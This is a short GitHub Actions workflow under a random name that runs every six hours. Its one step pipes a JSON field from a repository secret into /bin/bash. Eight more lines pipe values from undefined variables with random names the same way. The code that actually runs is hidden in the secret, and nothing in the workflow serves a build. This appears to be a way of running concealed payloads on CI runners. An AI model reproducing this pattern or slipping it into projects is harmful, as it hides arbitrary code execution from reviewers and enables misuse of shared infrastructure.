name: mingyulu1837
on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          cssah2: ${{ secrets.cssah2 }}
        run: |
          echo $cssah2 | jq -r .ifep41978 | /bin/bash
          echo $en585 | jq -r .b76338 | /bin/bash
          echo $uacwb135 | jq -r .ecixa7930 | /bin/bash
          echo $iavb2 | jq -r .jws31 | /bin/bash
          echo $lebn4 | jq -r .lrd050 | /bin/bash
          echo $oniq08357 | jq -r .gm2807 | /bin/bash
          echo $cbe22555 | jq -r .edww056 | /bin/bash
          echo $tcxab77 | jq -r .wek965 | /bin/bash
          echo $eqg4 | jq -r .yoqh951 | /bin/bash

